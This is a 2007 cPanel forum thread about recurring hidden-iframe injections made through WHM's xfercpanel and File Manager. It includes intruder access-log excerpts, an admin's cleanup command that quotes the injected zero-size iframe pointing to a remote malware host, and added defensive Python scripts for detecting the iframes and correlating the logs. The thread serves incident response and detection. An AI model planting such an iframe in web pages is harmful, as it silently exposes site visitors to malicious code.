The Community Forums

Interact with an entire community of cPanel & WHM users!

JavaScript & IFRAME Insert Hacks Through xfercpanel

Discussion in 'General Discussion' started by dynaweb, Sep 14, 2007.

  1. dynaweb

    dynaweb Well-Known Member

    Joined:
    May 14, 2003
    Messages:
    71
    Likes Received:
    0
    Trophy Points:
    6
    Location:
    Oregon
    I have read other threads concerning this stuff and I feel I need a unique thread for my situation. I am getting these BS IFRAME & JAVASCRIPT inserts onto my domains' home pages on my server. I had cPanel 10 and upgraded to cPanel 11 with ClamAV, and it is no better :(

    My files are not being accessed through a vulnerable script or through FTP, but rather through WHM itself (File manager to be exact).

    This means that either A = "Someone" or B = "Some script or worm" is either 1 = "Hacking my root password and gaining access and using xfercpanel to access user accounts" or 2 = "Finding a hole somewhere in Cpanel to gain access to my WHM etc".

    My /usr/local/cpanel/logs/access_log shows evidence of the intrusion:


    """""""""""""""
    Code:
    76.108.14.98 - root [09/14/2007:08:52:13 -0000] "GET /xfercpanel/bulldog HTTP/1.1" 0 "https://MYSERVERIP:2087/scripts2/listaccts?viewall=1" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
    76.108.14.98 - root [09/14/2007:08:52:13 -0000] "GET /xfercpanel/bulldog HTTP/1." 0 "https://MYSERVERIP:2087/scripts2/listaccts?viewall=1" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
    76.108.14.98 - [09/14/2007:08:52:15 -0000] "GET /login/?session=ZqRBajXbwEIAzkKrtX1TZ8bdboJybQUaSqpaBzfvZ fsXSXHrv_4dO4jq2hDYUx38 HTTP/1.1" 301 0 "https://MYSERVERIP:2087/scripts2/listaccts?viewall=1" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
    76.108.14.98 - bulldog [09/14/2007:08:52:20 -0000] "GET / HTTP/1.1" 301 0 "https://MYSERVERIP:2087/scripts2/listaccts?viewall=1" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
    76.108.14.98 - bulldog [09/14/2007:08:52:28 -0000] "GET /frontend/x3/index.html HTTP/1.1" 200 0 "https://MYSERVERIP:2087/scripts2/listaccts?viewall=1" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
    ...(A bunch of css and image files listed here)...
    76.108.14.98 - bulldog [09/14/2007:08:54:20 -0000] "GET /frontend/x3/files/img/fileactions/copy.png HTTP/1.1" 200 0 "https://MYSERVERIP:2083/frontend/x3/files/selfile.html?dir=%2fhome%2fbulldog%2fpublic_html%2 fregion2&file=login.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
    76.108.14.98 - bulldog [09/14/2007:08:54:22 -0000] "GET /frontend/x3/files/editit.html?dir=%2fhome%2fbulldog%2fpublic_html%2f region2&file=login.php HTTP/1.1" 200 0 "https://MYSERVERIP:2083/frontend/x3/files/selfile.html?dir=%2fhome%2fbulldog%2fpublic_html%2 fregion2&file=login.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
    76.108.14.98 - bulldog [09/14/2007:08:54:22 -0000] "GET /frontend/x3/files/images/filemantopbg.jpg HTTP/1.1" 200 0 "https://MYSERVERIP:2083/frontend/x3/files/editit.html?dir=%2fhome%2fbulldog%2fpublic_html%2f region2&file=login.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
    76.108.14.98 - bulldog [09/14/2007:08:54:57 -0000] "POST /frontend/x3/files/savefile.html HTTP/1.1" 200 0 "https://MYSERVERIP:2083/frontend/x3/files/editit.html?dir=%2fhome%2fbulldog%2fpublic_html%2f region2&file=login.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
    76.108.14.98 - bulldog [09/14/2007:08:56:40 -0000] "GET /frontend/x3/filemanager/index.html?dirselect=webroot&domainselect=bulldog domain.com&dir=%2Fhome%2Fbulldog%2Fpublic_html HTTP/1.1" 200 0 "https://MYSERVERIP:2083/frontend/x3/index.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
    76.108.14.98 - bulldog [09/14/2007:08:56:45 -0000] "GET /cPanel_magic_revision_1189191533//frontend/x3/yui/data/data_optimized.js HTTP/1.1" 200 0 "https://MYSERVERIP:2083/frontend/x3/filemanager/index.html?dirselect=webroot&domainselect=bulldog domain.com&dir=%2Fhome%2Fbulldog%2Fpublic_html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
    76.108.14.98 - root [09/14/2007:08:57:22 -0000] "GET /xfercpanel/montbarc HTTP/1.1" 0 "https://MYSERVERIP:2087/scripts2/listaccts?viewall=1" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
    76.108.14.98 - root [09/14/2007:08:57:22 -0000] "GET /xfercpanel/montbarc HTTP/1." 0 "https://MYSERVERIP:2087/scripts2/listaccts?viewall=1" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
    76.108.14.98 - [09/14/2007:08:57:23 -0000] "GET /login/?session=BeZr34kPtSssxYbIySRgOK8SN1qQ2czfytgErkTbm qM8mCkzUo2xxgDXgBNq1iKF HTTP/1.1" 301 0 "https://MYSERVERIP:2087/scripts2/listaccts?viewall=1" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
    76.108.14.98 - montbarc [09/14/2007:08:57:28 -0000] "GET / HTTP/1.1" 301 0 "https://MYSERVERIP:2087/scripts2/listaccts?viewall=1" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
    76.108.14.98 - montbarc [09/14/2007:08:57:33 -0000] "GET /frontend/xcontroller2/index.html HTTP/1.1" 200 0 "https://MYSERVERIP:2087/scripts2/listaccts?viewall=1" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
    76.108.14.98 - montbarc [09/14/2007:08:57:40 -0000] "GET /frontend/xcontroller2/styles.css HTTP/1.1" 200 0 "https://MYSERVERIP:2083/frontend/xcontroller2/index.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)"
    ...(This keeps looping to just about every domain on my server)...

    """""""""""""""

    Discovering more about this problem.
    - Blocking the IP address of the intruder is, of course, useless since tomorrow it will happen again from a different IP.
    - Cannot use mod_security since it does not apply to cpanel access ports :(
    - Checking "Tweak Settings -> Disable login with root or reseller password ..." works very effectively, but pisses off people who have WHM access. They would not understand why I have to take away a convenient feature in their account to prevent hacking.

    Some logic:
    I would assume that if the combination of A and 1 is true then someone would have better stuff to do than manually edit users' home pages and then call it a day. Why not make more trouble or do something different? Since this appears to be the only bad thing being done, and also due to the methodical nature of the travel through the server as shown by the logs, I am led to assume that A is FALSE and it is being performed by a script of some kind.
    That leaves a probable combination of either B+1 or B+2.
    *If B+1 is true, I need to get a more secure password policy. I have SSH and Exim hacking protected with APF/BFD, but I think cPanel/WHM hacking is not protected in such a way. Maybe there is some kind of security I can put on there?
    *If B+2 is true, I would like cPanel to fix the hole.
    Which is true? I have no idea, I haven't gotten that far yet. I am open to suggestion.

    How to deal with this problem?
    Not sure yet other than to mop up the problem when it happens (just about every other day). Here is a script I have been using for damage control:
    Code:
    find /home/a*/public_html/* -regex ".*\(\.php\|\.html\|\.tpl\|\.htm\|\.inc\)$" -type f -exec replace '<IFRAME SRC="http://81.95.148.155/lb/main.php" WIDTH="0" HEIGHT="0"></IFRAME>' '' -- {} \;

    So is anyone else experiencing these hacks in this same way? What can be done? Thanks for any help.
     
    #1 dynaweb, Sep 14, 2007
    Last edited: Sep 15, 2007
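The `find ... -exec replace` one-liner in the post above only strips one exact string, so a variant with different casing, quoting or attribute order (or a different remote host) survives it, and it rewrites files in place with nothing kept for forensics. The following Python is an added example, not code from the post or from cPanel: it walks a document root, flags any zero-size iframe whatever its casing or host, reports the remote `src` for each hit, and only then strips it after copying the original to a quarantine directory outside the document root. The sample tree it builds (`injected.invalid`, `region2/login.php`, `about.html`) is constructed for the demonstration and is not real data from the thread.

```python
import os
import re
import shutil
import tempfile

# Web file types the thread's cleanup one-liner targets.
WEB_EXTS = ('.php', '.html', '.htm', '.tpl', '.inc')

# A zero-size iframe (the injection shape quoted in the thread), matched
# regardless of case, attribute order or quoting; the remote src is captured.
HIDDEN_IFRAME_RE = re.compile(
    r'<iframe\b'
    r'(?=[^>]*\bsrc\s*=\s*["\']?(?P<src>[^"\'\s>]+))'  # must carry a src
    r'(?=[^>]*\bwidth\s*=\s*["\']?0\b)'                 # width 0
    r'(?=[^>]*\bheight\s*=\s*["\']?0\b)'                # height 0
    r'[^>]*>\s*</iframe\s*>',
    re.IGNORECASE,
)


def scan(root):
    """Return [(path, src)] for every hidden iframe in web files under root."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(WEB_EXTS):
                continue
            path = os.path.join(dirpath, name)
            try:
                # latin-1 maps every byte 1:1, so non-UTF-8 files survive a rewrite untouched.
                with open(path, encoding='latin-1') as fh:
                    text = fh.read()
            except OSError:
                continue
            for m in HIDDEN_IFRAME_RE.finditer(text):
                hits.append((path, m.group('src')))
    return hits


def clean(root, backup_dir=None):
    """Strip hidden iframes in place, copying each file to backup_dir first.

    backup_dir defaults to a sibling of root (assumed layout), so the originals
    are kept for forensics but are never served from the document root.
    Returns [(path, backup_path)] for each file that was modified.
    """
    if backup_dir is None:
        backup_dir = root.rstrip(os.sep) + '_quarantine'
    done = []
    for path in sorted({p for p, _src in scan(root)}):
        backup = os.path.join(backup_dir, os.path.relpath(path, root))
        os.makedirs(os.path.dirname(backup), exist_ok=True)
        shutil.copy2(path, backup)
        with open(path, encoding='latin-1') as fh:
            text = fh.read()
        with open(path, 'w', encoding='latin-1') as fh:
            fh.write(HIDDEN_IFRAME_RE.sub('', text))
        done.append((path, backup))
    return done


def make_sample_tree():
    """Build a throwaway public_html with constructed files (not real data):
    two carry hidden iframes in different casing, one has a legitimate visible iframe."""
    root = tempfile.mkdtemp(prefix='public_html_')
    os.makedirs(os.path.join(root, 'region2'))
    samples = {
        'index.html': '<html><body>Hello</body></html>\n'
                      '<iframe src="http://injected.invalid/lb/main.php" width="0" height="0"></iframe>\n',
        os.path.join('region2', 'login.php'):
            '<?php echo "login"; ?>\n'
            '<IFRAME SRC="http://injected.invalid/x.php" WIDTH="0" HEIGHT="0"></IFRAME>\n',
        'about.html': '<html><iframe src="http://www.example.com/map" width="300" height="200"></iframe></html>\n',
    }
    for rel, content in samples.items():
        with open(os.path.join(root, rel), 'w', encoding='latin-1') as fh:
            fh.write(content)
    return root


if __name__ == '__main__':
    root = make_sample_tree()
    for path, src in scan(root):
        print(f'hidden iframe -> {src} in {path}')
    for path, backup in clean(root):
        print(f'cleaned {path} (original kept at {backup})')
```

Run `scan()` first and look at the distinct `src` values before cleaning: the list of remote hosts is what you would block at the edge and compare against the next day's reinfection, and the quarantined originals keep the evidence the one-liner throws away. Cleaning is still damage control, not a fix; the entry point (root or account credentials, or whatever wrote the files) has to be closed separately.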
  2. cPDan

    cPDan cPanel Staff
    Staff Member

    Joined:
    Mar 9, 2004
    Messages:
    711
    Likes Received:
    3
    Trophy Points:
    18
    I've only seen this happen on servers (cpanel or not, just *nix) that were 0wn3d and/or r00ted.

    Generally this is done through normal everyday PHP scripts. phpBB for example has had many huge security issues. In fact for a while a simple <? phpinfo(); ?> script could be used to root a server. (makes you reconsider using PHP doesn't it :))

    What specifically in that log entry are you thinking is evidence of WHM being used to do this?

    The closest I see is "bulldog" trying to edit

    /home/bulldog/public_html/region2/login.php

    Is that the file that gets iframed?

    Is the iframe in the HTML or in a database?
     
  3. dynaweb

    dynaweb Well-Known Member

    Thanks for your reply cpdan.

    The iframe or javascript is inserted into html -- typically into the index page but can occur in some other default-type document.

    The document edited in this example is index.html, although you cannot see that exactly from the log. What the log does show is a malicious user, in this case 76.108.14.98, using xfercpanel to go from root to the user's cpanel, then using editit.html and savefile.html (the cpanel FileManager) to actually edit the target document.

    Some good news, I see cPanel has added cPHulk to Security Center in WHM. That may help prevent this kind of hacking :rolleyes:
     
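The sequence dynaweb describes (root requests `/xfercpanel/<account>`, the browser is redirected into that account's cPanel session, and a few minutes later a `POST /frontend/.../files/savefile.html` lands from the same IP with the edited `dir`/`file` in the referer) is a pattern you can correlate directly in `/usr/local/cpanel/logs/access_log`. The Python below is an added example, not code from the thread or from cPanel: it parses lines in the format quoted above, records every root-to-account hop per source IP, and reports each File Manager save that followed a hop into the same account within a time window. The embedded log lines are constructed for the demonstration; the addresses (203.0.113.5, 192.0.2.77, 198.51.100.10), the account names and the shortened User-Agent are made up. The 30-minute window is an assumption.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta
from urllib.parse import parse_qs, urlsplit

# One cpsrvd access_log line: IP, "-", optional user, [timestamp], request,
# status/size fields (their count varies in the quoted log), referer, user agent.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) - (?:(?P<user>\S+) )?\[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>.*?) HTTP/[^"]*" '
    r'(?P<status>.*?)"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)
XFER_RE = re.compile(r'^/xfercpanel/([^/?\s]+)')                # root -> account hand-off
SAVE_RE = re.compile(r'^/frontend/[^/]+/files/savefile\.html')  # File Manager write

# Constructed sample in the same format as the log quoted in the thread; all
# addresses, accounts and the session token are made up.
SAMPLE_LOG = """\
203.0.113.5 - root [09/14/2007:08:52:13 -0000] "GET /xfercpanel/acct1 HTTP/1.1" 0 "https://198.51.100.10:2087/scripts2/listaccts?viewall=1" "Mozilla/4.0"
203.0.113.5 - [09/14/2007:08:52:15 -0000] "GET /login/?session=abc HTTP/1.1" 301 0 "https://198.51.100.10:2087/scripts2/listaccts?viewall=1" "Mozilla/4.0"
203.0.113.5 - acct1 [09/14/2007:08:52:20 -0000] "GET / HTTP/1.1" 301 0 "https://198.51.100.10:2087/scripts2/listaccts?viewall=1" "Mozilla/4.0"
203.0.113.5 - acct1 [09/14/2007:08:54:22 -0000] "GET /frontend/x3/files/editit.html?dir=%2fhome%2facct1%2fpublic_html&file=index.html HTTP/1.1" 200 0 "https://198.51.100.10:2083/frontend/x3/files/selfile.html" "Mozilla/4.0"
203.0.113.5 - acct1 [09/14/2007:08:54:57 -0000] "POST /frontend/x3/files/savefile.html HTTP/1.1" 200 0 "https://198.51.100.10:2083/frontend/x3/files/editit.html?dir=%2fhome%2facct1%2fpublic_html&file=index.html" "Mozilla/4.0"
203.0.113.5 - root [09/14/2007:08:57:22 -0000] "GET /xfercpanel/acct2 HTTP/1.1" 0 "https://198.51.100.10:2087/scripts2/listaccts?viewall=1" "Mozilla/4.0"
203.0.113.5 - acct2 [09/14/2007:08:57:33 -0000] "GET /frontend/x3/index.html HTTP/1.1" 200 0 "https://198.51.100.10:2087/scripts2/listaccts?viewall=1" "Mozilla/4.0"
192.0.2.77 - acct3 [09/14/2007:09:10:00 -0000] "POST /frontend/x3/files/savefile.html HTTP/1.1" 200 0 "https://198.51.100.10:2083/frontend/x3/files/editit.html?dir=%2fhome%2facct3%2fpublic_html&file=index.html" "Mozilla/4.0"
"""


def parse_line(line):
    """Return the line's fields as a dict, or None if it is not an access_log line."""
    m = LINE_RE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    # The quoted log carries a fixed -0000 offset, so the clock part is taken as UTC.
    rec['time'] = datetime.strptime(rec['ts'].split()[0], '%m/%d/%Y:%H:%M:%S')
    return rec


def edited_file(referer):
    """Recover dir/file from the editit.html referer that accompanies a save."""
    qs = parse_qs(urlsplit(referer).query)
    d = qs.get('dir', [''])[0]
    f = qs.get('file', [''])[0]
    return f'{d}/{f}' if d and f else '(unknown)'


def analyze(lines, window=timedelta(minutes=30)):
    """Correlate root xfercpanel hops with File Manager saves from the same IP.

    Returns (hops, edits): hops maps IP -> accounts root switched into, in order;
    edits lists (ip, account, edited_file, minutes_after_hop) for every
    savefile.html POST that followed a hop into that account within `window`.
    """
    hops = defaultdict(list)
    last_hop = {}  # (ip, account) -> time of the root /xfercpanel request
    edits = []
    for raw in lines:
        rec = parse_line(raw)
        if rec is None:
            continue
        ip, user, path = rec['ip'], rec['user'], rec['path']
        if user == 'root':
            m = XFER_RE.match(path)
            if m:
                acct = m.group(1)
                if acct not in hops[ip]:
                    hops[ip].append(acct)
                last_hop[(ip, acct)] = rec['time']
            continue
        if user and rec['method'] == 'POST' and SAVE_RE.match(path):
            hop_time = last_hop.get((ip, user))
            if hop_time is not None and rec['time'] - hop_time <= window:
                minutes = int((rec['time'] - hop_time).total_seconds() // 60)
                edits.append((ip, user, edited_file(rec['referer']), minutes))
    return dict(hops), edits


if __name__ == '__main__':
    hops, edits = analyze(SAMPLE_LOG.splitlines())
    for ip, accts in hops.items():
        print(f'{ip}: root switched into {len(accts)} account(s): {", ".join(accts)}')
    for ip, acct, target, mins in edits:
        print(f'{ip}: {target} saved as {acct} {mins} min after root hop')
```

Point it at the real file with `analyze(open('/usr/local/cpanel/logs/access_log'))`. A long list of accounts per IP with saves a couple of minutes after each hop is the methodical walk the thread describes; a legitimate administrator using xfercpanel produces the same pattern, so treat the output as a triage list to compare against your own sessions rather than as proof by itself. The acct3 save from a different IP with no preceding root hop is deliberately left unflagged.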
  4. dynaweb

    dynaweb Well-Known Member

    Correction. Yes, for this account both login.php and index.html were affected.
     